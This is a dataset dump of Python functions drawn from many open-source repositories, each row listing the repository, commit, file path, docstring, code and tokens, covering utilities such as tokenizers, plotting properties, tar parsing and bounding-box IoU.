nwo
stringlengths
5
106
sha
stringlengths
40
40
path
stringlengths
4
174
language
stringclasses
1 value
identifier
stringlengths
1
140
parameters
stringlengths
0
87.7k
argument_list
stringclasses
1 value
return_statement
stringlengths
0
426k
docstring
stringlengths
0
64.3k
docstring_summary
stringlengths
0
26.3k
docstring_tokens
list
function
stringlengths
18
4.83M
function_tokens
list
url
stringlengths
83
304
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_flaskbb/Python-2.7.9/Demo/scripts/primes.py
python
primes
(min, max)
[]
def primes(min, max): if max >= 2 >= min: print 2 primes = [2] i = 3 while i <= max: for p in primes: if i % p == 0 or p*p > i: break if i % p != 0: primes.append(i) if i >= min: print i i += 2
[ "def", "primes", "(", "min", ",", "max", ")", ":", "if", "max", ">=", "2", ">=", "min", ":", "print", "2", "primes", "=", "[", "2", "]", "i", "=", "3", "while", "i", "<=", "max", ":", "for", "p", "in", "primes", ":", "if", "i", "%", "p", ...
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/Python-2.7.9/Demo/scripts/primes.py#L5-L18
IronLanguages/main
a949455434b1fda8c783289e897e78a9a0caabb5
External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py
python
Misc.pack_slaves
(self)
return map(self._nametowidget, self.tk.splitlist( self.tk.call('pack', 'slaves', self._w)))
Return a list of all slaves of this widget in its packing order.
Return a list of all slaves of this widget in its packing order.
[ "Return", "a", "list", "of", "all", "slaves", "of", "this", "widget", "in", "its", "packing", "order", "." ]
def pack_slaves(self): """Return a list of all slaves of this widget in its packing order.""" return map(self._nametowidget, self.tk.splitlist( self.tk.call('pack', 'slaves', self._w)))
[ "def", "pack_slaves", "(", "self", ")", ":", "return", "map", "(", "self", ".", "_nametowidget", ",", "self", ".", "tk", ".", "splitlist", "(", "self", ".", "tk", ".", "call", "(", "'pack'", ",", "'slaves'", ",", "self", ".", "_w", ")", ")", ")" ]
https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py#L1234-L1239
mlcommons/training
4a4d5a0b7efe99c680306b1940749211d4238a84
translation/tensorflow/bert/run_classifier.py
python
ColaProcessor.get_test_examples
(self, data_dir)
return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
See base class.
See base class.
[ "See", "base", "class", "." ]
def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
[ "def", "get_test_examples", "(", "self", ",", "data_dir", ")", ":", "return", "self", ".", "_create_examples", "(", "self", ".", "_read_tsv", "(", "os", ".", "path", ".", "join", "(", "data_dir", ",", "\"test.tsv\"", ")", ")", ",", "\"test\"", ")" ]
https://github.com/mlcommons/training/blob/4a4d5a0b7efe99c680306b1940749211d4238a84/translation/tensorflow/bert/run_classifier.py#L349-L352
plotly/plotly.py
cfad7862594b35965c0e000813bd7805e8494a5b
packages/python/plotly/plotly/graph_objs/_histogram.py
python
Histogram.xbins
(self)
return self["xbins"]
The 'xbins' property is an instance of XBins that may be specified as: - An instance of :class:`plotly.graph_objs.histogram.XBins` - A dict of string/value properties that will be passed to the XBins constructor Supported dict properties: end Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers. size Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided,the sample data from all traces is combined to determine `size` as described above. start Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non- overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins. Returns ------- plotly.graph_objs.histogram.XBins
The 'xbins' property is an instance of XBins that may be specified as: - An instance of :class:`plotly.graph_objs.histogram.XBins` - A dict of string/value properties that will be passed to the XBins constructor Supported dict properties: end Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers. size Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided,the sample data from all traces is combined to determine `size` as described above. start Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non- overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins.
[ "The", "xbins", "property", "is", "an", "instance", "of", "XBins", "that", "may", "be", "specified", "as", ":", "-", "An", "instance", "of", ":", "class", ":", "plotly", ".", "graph_objs", ".", "histogram", ".", "XBins", "-", "A", "dict", "of", "string...
def xbins(self): """ The 'xbins' property is an instance of XBins that may be specified as: - An instance of :class:`plotly.graph_objs.histogram.XBins` - A dict of string/value properties that will be passed to the XBins constructor Supported dict properties: end Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers. size Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided,the sample data from all traces is combined to determine `size` as described above. start Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non- overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins. Returns ------- plotly.graph_objs.histogram.XBins """ return self["xbins"]
[ "def", "xbins", "(", "self", ")", ":", "return", "self", "[", "\"xbins\"", "]" ]
https://github.com/plotly/plotly.py/blob/cfad7862594b35965c0e000813bd7805e8494a5b/packages/python/plotly/plotly/graph_objs/_histogram.py#L1730-L1789
openedx/edx-platform
68dd185a0ab45862a2a61e0f803d7e03d2be71b5
lms/djangoapps/instructor_task/tasks_helper/grades.py
python
CourseGradeReport._upload
(self, context, success_headers, success_rows, error_headers, error_rows)
Creates and uploads a CSV for the given headers and rows.
Creates and uploads a CSV for the given headers and rows.
[ "Creates", "and", "uploads", "a", "CSV", "for", "the", "given", "headers", "and", "rows", "." ]
def _upload(self, context, success_headers, success_rows, error_headers, error_rows): """ Creates and uploads a CSV for the given headers and rows. """ date = datetime.now(UTC) upload_csv_to_report_store( [success_headers] + success_rows, context.upload_filename, context.course_id, date, parent_dir=context.upload_parent_dir ) if len(error_rows) > 0: upload_csv_to_report_store( [error_headers] + error_rows, '{}_err'.format(context.upload_filename), context.course_id, date, parent_dir=context.upload_parent_dir )
[ "def", "_upload", "(", "self", ",", "context", ",", "success_headers", ",", "success_rows", ",", "error_headers", ",", "error_rows", ")", ":", "date", "=", "datetime", ".", "now", "(", "UTC", ")", "upload_csv_to_report_store", "(", "[", "success_headers", "]",...
https://github.com/openedx/edx-platform/blob/68dd185a0ab45862a2a61e0f803d7e03d2be71b5/lms/djangoapps/instructor_task/tasks_helper/grades.py#L483-L502
beeware/ouroboros
a29123c6fab6a807caffbb7587cf548e0c370296
ouroboros/tarfile.py
python
TarInfo._proc_gnusparse_01
(self, next, pax_headers)
Process a GNU tar extended sparse header, version 0.1.
Process a GNU tar extended sparse header, version 0.1.
[ "Process", "a", "GNU", "tar", "extended", "sparse", "header", "version", "0", ".", "1", "." ]
def _proc_gnusparse_01(self, next, pax_headers): """Process a GNU tar extended sparse header, version 0.1. """ sparse = [int(x) for x in pax_headers["GNU.sparse.map"].split(",")] next.sparse = list(zip(sparse[::2], sparse[1::2]))
[ "def", "_proc_gnusparse_01", "(", "self", ",", "next", ",", "pax_headers", ")", ":", "sparse", "=", "[", "int", "(", "x", ")", "for", "x", "in", "pax_headers", "[", "\"GNU.sparse.map\"", "]", ".", "split", "(", "\",\"", ")", "]", "next", ".", "sparse",...
https://github.com/beeware/ouroboros/blob/a29123c6fab6a807caffbb7587cf548e0c370296/ouroboros/tarfile.py#L1296-L1300
IOActive/XDiFF
552d3394e119ca4ced8115f9fd2d7e26760e40b1
classes/webserver.py
python
WebServer.stop_web_server
(self)
Web server shutdown when closing the fuzzer
Web server shutdown when closing the fuzzer
[ "Web", "server", "shutdown", "when", "closing", "the", "fuzzer" ]
def stop_web_server(self): """Web server shutdown when closing the fuzzer""" if self.server: self.settings['logger'].debug("Shutting down Web Server...") self.server.shutdown()
[ "def", "stop_web_server", "(", "self", ")", ":", "if", "self", ".", "server", ":", "self", ".", "settings", "[", "'logger'", "]", ".", "debug", "(", "\"Shutting down Web Server...\"", ")", "self", ".", "server", ".", "shutdown", "(", ")" ]
https://github.com/IOActive/XDiFF/blob/552d3394e119ca4ced8115f9fd2d7e26760e40b1/classes/webserver.py#L125-L129
benediktschmitt/py-ts3
043a6a896169d39464f6f754e2afd300f74eefa5
ts3/response.py
python
TS3Response._parse_item
(self, item)
return properties
>>> parse_item(b'key0=val0 key1=val1') {'key0': 'val0', 'key1': 'val1'}
>>> parse_item(b'key0=val0 key1=val1') {'key0': 'val0', 'key1': 'val1'}
[ ">>>", "parse_item", "(", "b", "key0", "=", "val0", "key1", "=", "val1", ")", "{", "key0", ":", "val0", "key1", ":", "val1", "}" ]
def _parse_item(self, item): """ >>> parse_item(b'key0=val0 key1=val1') {'key0': 'val0', 'key1': 'val1'} """ properties = item.split() properties = dict(self._parse_property(p) for p in properties) return properties
[ "def", "_parse_item", "(", "self", ",", "item", ")", ":", "properties", "=", "item", ".", "split", "(", ")", "properties", "=", "dict", "(", "self", ".", "_parse_property", "(", "p", ")", "for", "p", "in", "properties", ")", "return", "properties" ]
https://github.com/benediktschmitt/py-ts3/blob/043a6a896169d39464f6f754e2afd300f74eefa5/ts3/response.py#L254-L261
CJWorkbench/cjworkbench
e0b878d8ff819817fa049a4126efcbfcec0b50e6
cjwstate/models/module_registry.py
python
download_module_zipfile
( tempdir: Path, module_id: ModuleId, version: ModuleVersion, *, deprecated_spec: Dict[str, Any], deprecated_js_module: str, )
return ret
Produce a local-path ModuleZipfile by downloading from s3. Raise `RuntimeError` (_from_ another kind of error -- `FileNotFoundError`, `KeyError`, `ValueError`, `SyntaxError`, `BadZipFile`, `UnicodeDecodeError` or more) if the zipfile is not a valid Workbench module. We spend the time testing the zipfile for validity because A) it's good to catch errors quickly; and B) fetcher, renderer and server all need to execute code on each module, so they're destined to validate the module anyway. The zipfile is always written to "{tempdir}/{module_id}.{version}.zip". This function is not re-entrant when called with the same parameters. Callers may use locks to avoid trying to download the same data multiple times.
Produce a local-path ModuleZipfile by downloading from s3.
[ "Produce", "a", "local", "-", "path", "ModuleZipfile", "by", "downloading", "from", "s3", "." ]
def download_module_zipfile( tempdir: Path, module_id: ModuleId, version: ModuleVersion, *, deprecated_spec: Dict[str, Any], deprecated_js_module: str, ) -> ModuleZipfile: """Produce a local-path ModuleZipfile by downloading from s3. Raise `RuntimeError` (_from_ another kind of error -- `FileNotFoundError`, `KeyError`, `ValueError`, `SyntaxError`, `BadZipFile`, `UnicodeDecodeError` or more) if the zipfile is not a valid Workbench module. We spend the time testing the zipfile for validity because A) it's good to catch errors quickly; and B) fetcher, renderer and server all need to execute code on each module, so they're destined to validate the module anyway. The zipfile is always written to "{tempdir}/{module_id}.{version}.zip". This function is not re-entrant when called with the same parameters. Callers may use locks to avoid trying to download the same data multiple times. """ logger.info("download_module_zipfile(%s.%s.zip)", module_id, version) tempdir.mkdir(parents=True, exist_ok=True) zippath = tempdir / ("%s.%s.zip" % (module_id, version)) try: # raise FileNotFoundError s3.download( s3.ExternalModulesBucket, "%s/%s.%s.zip" % (module_id, module_id, version), zippath, ) except FileNotFoundError as original_error: raise RuntimeError from original_error ret = ModuleZipfile(zippath) # raise ZipfileError try: # raise KeyError or SyntaxError compiled_module = ret.compile_code_without_executing() ret.get_spec() # raise KeyError or ValueError cjwstate.modules.kernel.validate(compiled_module) # raise ModuleError except Exception as err: raise RuntimeError from err return ret
[ "def", "download_module_zipfile", "(", "tempdir", ":", "Path", ",", "module_id", ":", "ModuleId", ",", "version", ":", "ModuleVersion", ",", "*", ",", "deprecated_spec", ":", "Dict", "[", "str", ",", "Any", "]", ",", "deprecated_js_module", ":", "str", ",", ...
https://github.com/CJWorkbench/cjworkbench/blob/e0b878d8ff819817fa049a4126efcbfcec0b50e6/cjwstate/models/module_registry.py#L163-L209
entropy1337/infernal-twin
10995cd03312e39a48ade0f114ebb0ae3a711bb8
Modules/build/pip/build/lib.linux-i686-2.7/pip/_vendor/ipaddress.py
python
_BaseV4._string_from_ip_int
(cls, ip_int)
return '.'.join(_compat_str(struct.unpack(b'!B', b)[0] if isinstance(b, bytes) else b) for b in _compat_to_bytes(ip_int, 4, 'big'))
Turns a 32-bit integer into dotted decimal notation. Args: ip_int: An integer, the IP address. Returns: The IP address as a string in dotted decimal notation.
Turns a 32-bit integer into dotted decimal notation.
[ "Turns", "a", "32", "-", "bit", "integer", "into", "dotted", "decimal", "notation", "." ]
def _string_from_ip_int(cls, ip_int): """Turns a 32-bit integer into dotted decimal notation. Args: ip_int: An integer, the IP address. Returns: The IP address as a string in dotted decimal notation. """ return '.'.join(_compat_str(struct.unpack(b'!B', b)[0] if isinstance(b, bytes) else b) for b in _compat_to_bytes(ip_int, 4, 'big'))
[ "def", "_string_from_ip_int", "(", "cls", ",", "ip_int", ")", ":", "return", "'.'", ".", "join", "(", "_compat_str", "(", "struct", ".", "unpack", "(", "b'!B'", ",", "b", ")", "[", "0", "]", "if", "isinstance", "(", "b", ",", "bytes", ")", "else", ...
https://github.com/entropy1337/infernal-twin/blob/10995cd03312e39a48ade0f114ebb0ae3a711bb8/Modules/build/pip/build/lib.linux-i686-2.7/pip/_vendor/ipaddress.py#L1309-L1322
Pymol-Scripts/Pymol-script-repo
bcd7bb7812dc6db1595953dfa4471fa15fb68c77
modules/pdb2pqr/contrib/numpy-1.1.0/numpy/lib/financial.py
python
pv
(rate, nper, pmt, fv=0.0, when='end')
return -(fv + pmt*fact)/temp
Number of periods found by solving the equation
Number of periods found by solving the equation
[ "Number", "of", "periods", "found", "by", "solving", "the", "equation" ]
def pv(rate, nper, pmt, fv=0.0, when='end'): """Number of periods found by solving the equation """ when = _convert_when(when) rate, nper, pmt, fv, when = map(np.asarray, [rate, nper, pmt, fv, when]) temp = (1+rate)**nper miter = np.broadcast(rate, nper, pmt, fv, when) zer = np.zeros(miter.shape) fact = np.where(rate == zer, nper+zer, (1+rate*when)*(temp-1)/rate+zer) return -(fv + pmt*fact)/temp
[ "def", "pv", "(", "rate", ",", "nper", ",", "pmt", ",", "fv", "=", "0.0", ",", "when", "=", "'end'", ")", ":", "when", "=", "_convert_when", "(", "when", ")", "rate", ",", "nper", ",", "pmt", ",", "fv", ",", "when", "=", "map", "(", "np", "."...
https://github.com/Pymol-Scripts/Pymol-script-repo/blob/bcd7bb7812dc6db1595953dfa4471fa15fb68c77/modules/pdb2pqr/contrib/numpy-1.1.0/numpy/lib/financial.py#L150-L159
ArduPilot/pymavlink
9d6ea618e8d0622bee95fa902b6251882e225afb
quaternion.py
python
Quaternion.transform
(self, v3)
Calculates the vector transformed by this quaternion :param v3: Vector3 to be transformed :returns: transformed vector
Calculates the vector transformed by this quaternion :param v3: Vector3 to be transformed :returns: transformed vector
[ "Calculates", "the", "vector", "transformed", "by", "this", "quaternion", ":", "param", "v3", ":", "Vector3", "to", "be", "transformed", ":", "returns", ":", "transformed", "vector" ]
def transform(self, v3): """ Calculates the vector transformed by this quaternion :param v3: Vector3 to be transformed :returns: transformed vector """ if isinstance(v3, Vector3): t = super(Quaternion, self).transform([v3.x, v3.y, v3.z]) return Vector3(t[0], t[1], t[2]) elif len(v3) == 3: return super(Quaternion, self).transform(v3) else: raise TypeError("param v3 is not a vector type")
[ "def", "transform", "(", "self", ",", "v3", ")", ":", "if", "isinstance", "(", "v3", ",", "Vector3", ")", ":", "t", "=", "super", "(", "Quaternion", ",", "self", ")", ".", "transform", "(", "[", "v3", ".", "x", ",", "v3", ".", "y", ",", "v3", ...
https://github.com/ArduPilot/pymavlink/blob/9d6ea618e8d0622bee95fa902b6251882e225afb/quaternion.py#L539-L551
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/lib/django-1.2/django/template/loader.py
python
get_template
(template_name)
return template
Returns a compiled Template object for the given template name, handling template inheritance recursively.
Returns a compiled Template object for the given template name, handling template inheritance recursively.
[ "Returns", "a", "compiled", "Template", "object", "for", "the", "given", "template", "name", "handling", "template", "inheritance", "recursively", "." ]
def get_template(template_name): """ Returns a compiled Template object for the given template name, handling template inheritance recursively. """ template, origin = find_template(template_name) if not hasattr(template, 'render'): # template needs to be compiled template = get_template_from_string(template, origin, template_name) return template
[ "def", "get_template", "(", "template_name", ")", ":", "template", ",", "origin", "=", "find_template", "(", "template_name", ")", "if", "not", "hasattr", "(", "template", ",", "'render'", ")", ":", "# template needs to be compiled", "template", "=", "get_template...
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/lib/django-1.2/django/template/loader.py#L152-L161
thaines/helit
04bd36ee0fb6b762c63d746e2cd8813641dceda9
lda_gibbs/document.py
python
Document.dupWords
(self)
return self.wordCount
Returns the number of words in the document, counting duplicates.
Returns the number of words in the document, counting duplicates.
[ "Returns", "the", "number", "of", "words", "in", "the", "document", "counting", "duplicates", "." ]
def dupWords(self): """Returns the number of words in the document, counting duplicates.""" return self.wordCount
[ "def", "dupWords", "(", "self", ")", ":", "return", "self", ".", "wordCount" ]
https://github.com/thaines/helit/blob/04bd36ee0fb6b762c63d746e2cd8813641dceda9/lda_gibbs/document.py#L83-L85
google-research/language
61fa7260ac7d690d11ef72ca863e45a37c0bdc80
language/emql/util.py
python
compute_average_precision_at_k
( logits, labels, k)
return average_precision_at_k
Compute average precision at k. Args: logits: batch_size, nun_candidate labels: batch_size, num_candidate k: scalar Returns: average_precision_at_k
Compute average precision at k.
[ "Compute", "average", "precision", "at", "k", "." ]
def compute_average_precision_at_k( logits, labels, k): """Compute average precision at k. Args: logits: batch_size, nun_candidate labels: batch_size, num_candidate k: scalar Returns: average_precision_at_k """ _, topk = tf.nn.top_k(logits, k) # batch_size, k true_positives = tf.gather(labels, topk, batch_dims=1) # batch_size, k # e.g. [[0, 1, 1, 0], [1, 0, 0, 1]] upper_triangle_matrix = tf.constant( np.triu(np.ones([k, k])), dtype=tf.float32) # k, k # e.g. [[1,1,1,1], [0,1,1,1], [0,0,1,1], [0,0,0,1]] upper_triangle_matrix /= tf.reduce_sum( upper_triangle_matrix, axis=0, keepdims=True) # k, k # e.g. [[1,1/2,1/3,1/4], [0,1/2,1/3,1/4], [0,0,1/3,1/4], [0,0,0,1/4]] recall_at_k = tf.matmul(true_positives, upper_triangle_matrix) # batch_size, k # e.g. [[0, 1/2, 2/3, 2/4], [1, 1/2, 1/3, 2/4]] positive_recall_at_k = true_positives * recall_at_k # batch_size, k # e.g. [[0, 1/2, 2/3, 0], [1, 0, 0, 2/4]] num_true_positive = tf.reduce_sum(true_positives, axis=1) # batch_size # e.g. [2, 2] num_true_positive_replace_0_with_1 = tf.where( num_true_positive > 0, num_true_positive, tf.ones(tf.shape(num_true_positive), dtype=tf.float32)) average_precision_at_k = \ tf.reduce_sum(positive_recall_at_k, axis=1) \ / num_true_positive_replace_0_with_1 # batch_size # e.g. [(1/2 + 2/3) / 2, (1 + 2/4) / 2] return average_precision_at_k
[ "def", "compute_average_precision_at_k", "(", "logits", ",", "labels", ",", "k", ")", ":", "_", ",", "topk", "=", "tf", ".", "nn", ".", "top_k", "(", "logits", ",", "k", ")", "# batch_size, k", "true_positives", "=", "tf", ".", "gather", "(", "labels", ...
https://github.com/google-research/language/blob/61fa7260ac7d690d11ef72ca863e45a37c0bdc80/language/emql/util.py#L97-L140
airsplay/lxmert
0db1182b9030da3ce41f17717cc628e1cd0a95d5
src/lxrt/tokenization.py
python
BertTokenizer.__init__
(self, vocab_file, do_lower_case=True, max_len=None, do_basic_tokenize=True, never_split=("[UNK]", "[SEP]", "[PAD]", "[CLS]", "[MASK]"))
Constructs a BertTokenizer. Args: vocab_file: Path to a one-wordpiece-per-line vocabulary file do_lower_case: Whether to lower case the input Only has an effect when do_wordpiece_only=False do_basic_tokenize: Whether to do basic tokenization before wordpiece. max_len: An artificial maximum length to truncate tokenized sequences to; Effective maximum length is always the minimum of this value (if specified) and the underlying BERT model's sequence length. never_split: List of tokens which will never be split during tokenization. Only has an effect when do_wordpiece_only=False
Constructs a BertTokenizer.
[ "Constructs", "a", "BertTokenizer", "." ]
def __init__(self, vocab_file, do_lower_case=True, max_len=None, do_basic_tokenize=True, never_split=("[UNK]", "[SEP]", "[PAD]", "[CLS]", "[MASK]")): """Constructs a BertTokenizer. Args: vocab_file: Path to a one-wordpiece-per-line vocabulary file do_lower_case: Whether to lower case the input Only has an effect when do_wordpiece_only=False do_basic_tokenize: Whether to do basic tokenization before wordpiece. max_len: An artificial maximum length to truncate tokenized sequences to; Effective maximum length is always the minimum of this value (if specified) and the underlying BERT model's sequence length. never_split: List of tokens which will never be split during tokenization. Only has an effect when do_wordpiece_only=False """ if not os.path.isfile(vocab_file): raise ValueError( "Can't find a vocabulary file at path '{}'. To load the vocabulary from a Google pretrained " "model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`".format(vocab_file)) self.vocab = load_vocab(vocab_file) self.ids_to_tokens = collections.OrderedDict( [(ids, tok) for tok, ids in self.vocab.items()]) self.do_basic_tokenize = do_basic_tokenize if do_basic_tokenize: self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case, never_split=never_split) self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab) self.max_len = max_len if max_len is not None else int(1e12)
[ "def", "__init__", "(", "self", ",", "vocab_file", ",", "do_lower_case", "=", "True", ",", "max_len", "=", "None", ",", "do_basic_tokenize", "=", "True", ",", "never_split", "=", "(", "\"[UNK]\"", ",", "\"[SEP]\"", ",", "\"[PAD]\"", ",", "\"[CLS]\"", ",", ...
https://github.com/airsplay/lxmert/blob/0db1182b9030da3ce41f17717cc628e1cd0a95d5/src/lxrt/tokenization.py#L75-L103
mongodb/mongo-python-driver
c760f900f2e4109a247c2ffc8ad3549362007772
pymongo/message.py
python
_Query.as_command
(self, sock_info)
return self._as_command
Return a find command document for this query.
Return a find command document for this query.
[ "Return", "a", "find", "command", "document", "for", "this", "query", "." ]
def as_command(self, sock_info): """Return a find command document for this query.""" # We use the command twice: on the wire and for command monitoring. # Generate it once, for speed and to avoid repeating side-effects. if self._as_command is not None: return self._as_command explain = '$explain' in self.spec cmd = _gen_find_command( self.coll, self.spec, self.fields, self.ntoskip, self.limit, self.batch_size, self.flags, self.read_concern, self.collation, self.session, self.allow_disk_use) if explain: self.name = 'explain' cmd = SON([('explain', cmd)]) session = self.session sock_info.add_server_api(cmd) if session: session._apply_to(cmd, False, self.read_preference, sock_info) # Explain does not support readConcern. if not explain and not session.in_transaction: session._update_read_concern(cmd, sock_info) sock_info.send_cluster_time(cmd, session, self.client) # Support auto encryption client = self.client if client._encrypter and not client._encrypter._bypass_auto_encryption: cmd = client._encrypter.encrypt(self.db, cmd, self.codec_options) self._as_command = cmd, self.db return self._as_command
[ "def", "as_command", "(", "self", ",", "sock_info", ")", ":", "# We use the command twice: on the wire and for command monitoring.", "# Generate it once, for speed and to avoid repeating side-effects.", "if", "self", ".", "_as_command", "is", "not", "None", ":", "return", "self...
https://github.com/mongodb/mongo-python-driver/blob/c760f900f2e4109a247c2ffc8ad3549362007772/pymongo/message.py#L287-L315
FabriceSalvaire/PySpice
1fb97dc21abcf04cfd78802671322eef5c0de00b
PySpice/Spice/Parser_jmgc.py
python
SubCircuitStatement.params
(self)
return self._params
Params of the sub-circuit.
Params of the sub-circuit.
[ "Params", "of", "the", "sub", "-", "circuit", "." ]
def params(self): """Params of the sub-circuit.""" return self._params
[ "def", "params", "(", "self", ")", ":", "return", "self", ".", "_params" ]
https://github.com/FabriceSalvaire/PySpice/blob/1fb97dc21abcf04cfd78802671322eef5c0de00b/PySpice/Spice/Parser_jmgc.py#L523-L525
ewels/MultiQC
9b953261d3d684c24eef1827a5ce6718c847a5af
multiqc/modules/somalier/somalier.py
python
MultiqcModule.parse_somalier_pairs_tsv
(self, f)
return parsed_data
Parse csv output from somalier
Parse csv output from somalier
[ "Parse", "csv", "output", "from", "somalier" ]
def parse_somalier_pairs_tsv(self, f): """Parse csv output from somalier""" parsed_data = dict() headers = None s_name_idx = None for l in f["f"].splitlines(): s = l.lstrip("#").split("\t") if headers is None: headers = s try: s_name_idx = [headers.index("sample_a"), headers.index("sample_b")] except ValueError: log.warning("Could not find sample name in somalier output: {}".format(f["fn"])) return None else: s_name = "*".join([s[idx] for idx in s_name_idx]) # not safe to hard code, but works parsed_data[s_name] = dict() for i, v in enumerate(s): if i not in s_name_idx: # Skip if (i == 0 or 1); i.e. sample_a, sample_b if isnan(float(v)) or isinf(float(v)): # TODO: find better solution log.debug("Found Inf or NaN value. Overwriting with -2.") v = -2 try: # add the pattern as a suffix to key parsed_data[s_name][headers[i]] = float(v) except ValueError: # add the pattern as a suffix to key parsed_data[s_name][headers[i]] = v if len(parsed_data) == 0: return None return parsed_data
[ "def", "parse_somalier_pairs_tsv", "(", "self", ",", "f", ")", ":", "parsed_data", "=", "dict", "(", ")", "headers", "=", "None", "s_name_idx", "=", "None", "for", "l", "in", "f", "[", "\"f\"", "]", ".", "splitlines", "(", ")", ":", "s", "=", "l", ...
https://github.com/ewels/MultiQC/blob/9b953261d3d684c24eef1827a5ce6718c847a5af/multiqc/modules/somalier/somalier.py#L123-L155
aleju/imgaug
0101108d4fed06bc5056c4a03e2bcb0216dac326
imgaug/augmenters/geometric.py
python
_AffineMatrixGenerator.__init__
(self, matrix=None)
[]
def __init__(self, matrix=None): if matrix is None: matrix = np.eye(3, dtype=np.float32) self.matrix = matrix
[ "def", "__init__", "(", "self", ",", "matrix", "=", "None", ")", ":", "if", "matrix", "is", "None", ":", "matrix", "=", "np", ".", "eye", "(", "3", ",", "dtype", "=", "np", ".", "float32", ")", "self", ".", "matrix", "=", "matrix" ]
https://github.com/aleju/imgaug/blob/0101108d4fed06bc5056c4a03e2bcb0216dac326/imgaug/augmenters/geometric.py#L619-L622
DataDog/integrations-core
934674b29d94b70ccc008f76ea172d0cdae05e1e
marklogic/datadog_checks/marklogic/config_models/defaults.py
python
instance_extra_headers
(field, value)
return get_default_field_value(field, value)
[]
def instance_extra_headers(field, value): return get_default_field_value(field, value)
[ "def", "instance_extra_headers", "(", "field", ",", "value", ")", ":", "return", "get_default_field_value", "(", "field", ",", "value", ")" ]
https://github.com/DataDog/integrations-core/blob/934674b29d94b70ccc008f76ea172d0cdae05e1e/marklogic/datadog_checks/marklogic/config_models/defaults.py#L69-L70
ambakick/Person-Detection-and-Tracking
f925394ac29b5cf321f1ce89a71b193381519a0b
utils/np_box_list_ops.py
python
iou
(boxlist1, boxlist2)
return np_box_ops.iou(boxlist1.get(), boxlist2.get())
Computes pairwise intersection-over-union between box collections. Args: boxlist1: BoxList holding N boxes boxlist2: BoxList holding M boxes Returns: a numpy array with shape [N, M] representing pairwise iou scores.
Computes pairwise intersection-over-union between box collections.
[ "Computes", "pairwise", "intersection", "-", "over", "-", "union", "between", "box", "collections", "." ]
def iou(boxlist1, boxlist2): """Computes pairwise intersection-over-union between box collections. Args: boxlist1: BoxList holding N boxes boxlist2: BoxList holding M boxes Returns: a numpy array with shape [N, M] representing pairwise iou scores. """ return np_box_ops.iou(boxlist1.get(), boxlist2.get())
